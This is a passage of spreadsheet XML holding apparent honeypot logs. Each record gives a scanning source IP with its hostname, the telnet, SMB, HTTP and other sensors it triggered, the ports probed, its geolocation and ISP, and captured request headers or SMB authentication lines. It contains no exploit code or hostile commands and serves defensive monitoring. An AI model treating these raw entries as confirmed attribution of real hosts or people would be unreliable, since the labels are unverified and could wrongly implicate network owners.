SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;4520&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;30938&amp;&amp;26440</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:7f92</t>
  </si>
  <si>
    <t>13ab79e8354569734dd0eccf4f42f63a</t>
  </si>
  <si>
    <t>37.115.183.6</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_SOCKS5_H42&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;22&amp;&amp;389&amp;&amp;631&amp;&amp;80&amp;&amp;443&amp;&amp;5900&amp;&amp;1080&amp;&amp;27367&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2573:b706</t>
  </si>
  <si>
    <t>0337399f559a73f4a565e51e0d7d6af1</t>
  </si>
  <si>
    <t>152.89.160.98</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_LDAP_HC1</t>
  </si>
  <si>
    <t>5432&amp;&amp;389&amp;&amp;6667</t>
  </si>
  <si>
    <t>Serbia</t>
  </si>
  <si>
    <t>Central Serbia</t>
  </si>
  <si>
    <t>Belgrade</t>
  </si>
  <si>
    <t>792680</t>
  </si>
  <si>
    <t>44.804</t>
  </si>
  <si>
    <t>20.4651</t>
  </si>
  <si>
    <t>M247 Ltd</t>
  </si>
  <si>
    <t>{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}</t>
  </si>
  <si>
    <t>::ffff:9859:a062</t>
  </si>
  <si>
    <t>48413a93518b8672e278d1316de1cf6a</t>
  </si>
  <si>
    <t>117.253.166.77</t>
  </si>
  <si>
    <t>::ffff:75fd:a64d</t>
  </si>
  <si>
    <t>7077f3d6b6bdd033104fe665b9cbd0f6</t>
  </si>
  <si>
    <t>220.133.139.17</t>
  </si>
  <si>
    <t>220-133-139-17.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;31462&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:8b11</t>
  </si>
  <si>
    <t>232db5fcbbf0b9c3290052a8a1b087ed</t>
  </si>
  <si>
    <t>220.133.171.22</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-171-22.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_HTTP_H23&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5432&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;54370&amp;&amp;23&amp;&amp;44527&amp;&amp;38566&amp;&amp;38594&amp;&amp;37067&amp;&amp;37092&amp;&amp;27396&amp;&amp;37106&amp;&amp;9100&amp;&amp;1798</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:ab16</t>
  </si>
  <si>
    <t>d5064f575e3782fff5491e66752d0bda</t>
  </si>
  <si>
    <t>125.229.225.159</t>
  </si>
  <si>
    <t>125-229-225-159.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;29137&amp;&amp;23&amp;&amp;9100&amp;&amp;48493&amp;&amp;53621</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:e19f</t>
  </si>
  <si>
    <t>e2143eba758334d88a24149672a5c5e7</t>
  </si>
  <si>
    <t>114.34.141.233</t>
  </si>
  <si>
    <t>114-34-141-233.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>::ffff:7222:8de9</t>
  </si>
  <si>
    <t>7e0b146fb3d62f63b7851768ad8ee282</t>
  </si>
  <si>
    <t>1.34.126.178</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-34-126-178.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;36808&amp;&amp;22573&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:7eb2</t>
  </si>
  <si>
    <t>03d9356bedab902f75c6608b7f80a325</t>
  </si>
  <si>
    <t>117.209.145.72</t>
  </si>
  <si>
    <t>::ffff:75d1:9148</t>
  </si>
  <si>
    <t>bd429778ffabc8079f975696f5f89055</t>
  </si>
  <si>
    <t>182.152.10.37</t>
  </si>
  <si>
    <t>::ffff:b698:a25</t>
  </si>
  <si>
    <t>0fedb6b41299747637b1e522632f917e</t>
  </si>
  <si>
    <t>120.60.38.68</t>
  </si>
  <si>
    <t>::ffff:783c:2644</t>
  </si>
  <si>
    <t>9e9160ef4ffa219b09e12e72ef9ab418</t>
  </si>
  <si>
    <t>220.133.83.143</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-83-143.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;54860&amp;&amp;23&amp;&amp;47783&amp;&amp;47799&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:538f</t>
  </si>
  <si>
    <t>f89d73263b16c4af865d93553a4a6905</t>
  </si>
  <si>
    <t>117.198.100.50</t>
  </si>
  <si>
    <t>::ffff:75c6:6432</t>
  </si>
  <si>
    <t>691b0aa1f704f8032c5fffd4f9a9bbf2</t>
  </si>
  <si>
    <t>115.127.81.122</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;54290&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>Dhaka (Mohammadpur)</t>
  </si>
  <si>
    <t>1207</t>
  </si>
  <si>
    <t>23.7639</t>
  </si>
  <si>
    <t>90.3707</t>
  </si>
  <si>
    <t>24342</t>
  </si>
  <si>
    <t>BRACNet Limited</t>
  </si>
  <si>
    <t>bracNet</t>
  </si>
  <si>
    <t>2008-08-12</t>
  </si>
  <si>
    <t>BBN-BD</t>
  </si>
  <si>
    <t>::ffff:737f:517a</t>
  </si>
  <si>
    <t>49257492cec0cb7fa2337acc466a0c9f</t>
  </si>
  <si>
    <t>114.34.92.17</t>
  </si>
  <si>
    <t>114-34-92-17.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;54680&amp;&amp;47097&amp;&amp;47120&amp;&amp;9100&amp;&amp;45098</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:5c11</t>
  </si>
  <si>
    <t>07eb18447ec09d4cdf986edcbb601450</t>
  </si>
  <si>
    <t>103.47.14.40</t>
  </si>
  <si>
    <t>1273313</t>
  </si>
  <si>
    <t>30.3244</t>
  </si>
  <si>
    <t>78.0339</t>
  </si>
  <si>
    <t>58906</t>
  </si>
  <si>
    <t>Shivansh Infotech pvt Ltd</t>
  </si>
  <si>
    <t>Precious netcom pvt ltd</t>
  </si>
  <si>
    <t>2014-12-23</t>
  </si>
  <si>
    <t>PNPL</t>
  </si>
  <si>
    <t>::ffff:672f:e28</t>
  </si>
  <si>
    <t>3cd21e1cf6440420e9115b48394c993d</t>
  </si>
  <si>
    <t>117.193.244.211</t>
  </si>
  <si>
    <t>::ffff:75c1:f4d3</t>
  </si>
  <si>
    <t>6116d6c7e7e998c630bbfa07db453234</t>
  </si>
  <si>
    <t>117.248.170.161</t>
  </si>
  <si>
    <t>::ffff:75f8:aaa1</t>
  </si>
  <si>
    <t>9645ad3d0556d8dff3dde3b80f9b72f7</t>
  </si>
  <si>
    <t>103.42.75.85</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>Bengaluru (Vinayaka Nagar)</t>
  </si>
  <si>
    <t>12.9497</t>
  </si>
  <si>
    <t>77.5954</t>
  </si>
  <si>
    <t>139195</t>
  </si>
  <si>
    <t>Seans Media Pvt Ltd</t>
  </si>
  <si>
    <t>Telex Air Telecom</t>
  </si>
  <si>
    <t>TelexAir Telecom Pvt Ltd</t>
  </si>
  <si>
    <t>2014-10-31</t>
  </si>
  <si>
    <t>INFYNIXD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,63994)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,55506)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,55833)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,61647)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,61667)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,62127)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:672a:4b55</t>
  </si>
  <si>
    <t>55ee26b3b55d7b6595dbca3e8542d80c</t>
  </si>
  <si>
    <t>125.99.1.240</t>
  </si>
  <si>
    <t>::ffff:7d63:1f0</t>
  </si>
  <si>
    <t>f4589b17740c7e54aa406fb01400cd89</t>
  </si>
  <si>
    <t>27.54.178.152</t>
  </si>
  <si>
    <t>{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}</t>
  </si>
  <si>
    <t>2010-03-25</t>
  </si>
  <si>
    <t>::ffff:1b36:b298</t>
  </si>
  <si>
    <t>e9cdd2bbbaf024e9c20529a584eadd9b</t>
  </si>
  <si>
    <t>117.241.84.57</t>
  </si>
  <si>
    <t>::ffff:75f1:5439</t>
  </si>
  <si>
    <t>ef289c50a916097d38f307172e22c59e</t>
  </si>
  <si>
    <t>162.216.111.48</t>
  </si>
  <si>
    <t>NA&amp;&amp;162-216-111-48.mm.cstr.royell.org</t>
  </si>
  <si>
    <t>Macoupin</t>
  </si>
  <si>
    <t>Virden</t>
  </si>
  <si>
    <t>4252060</t>
  </si>
  <si>
    <t>62690</t>
  </si>
  <si>
    <t>39.5018</t>
  </si>
  <si>
    <t>-89.7737</t>
  </si>
  <si>
    <t>10958</t>
  </si>
  <si>
    <t>Royell Communications, Inc.</t>
  </si>
  <si>
    <t>ROYELLNET</t>
  </si>
  <si>
    <t>2001-03-26 19:46:06</t>
  </si>
  <si>
    <t>2027-03-26 19:46:07</t>
  </si>
  <si>
    <t>2025-03-27 16:16:06</t>
  </si>
  <si>
    <t>['dns1.royell.org', 'dns2.royell.org']</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientRenewProhibited https://icann.org/epp#clientRenewProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'autoRenewPeriod https://icann.org/epp#autoRenewPeriod', 'renewPeriod https://icann.org/epp#renewPeriod']</t>
  </si>
  <si>
    <t>::ffff:a2d8:6f30</t>
  </si>
  <si>
    <t>53d5ac24afe1cc96959225d46c3b9955</t>
  </si>
  <si>
    <t>125.20.125.182</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>389&amp;&amp;445&amp;&amp;63947&amp;&amp;1433&amp;&amp;16455&amp;&amp;53397&amp;&amp;3306</t>
  </si>
  <si>
    <t>28.5508</t>
  </si>
  <si>
    <t>77.268</t>
  </si>
  <si>
    <t>::ffff:7d14:7db6</t>
  </si>
  <si>
    <t>c6bef5a9968ae5b509c535fa52f1345b</t>
  </si>
  <si>
    <t>218.161.80.219</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-80-219.hinet-ip.hinet.net</t>
  </si>
  <si>
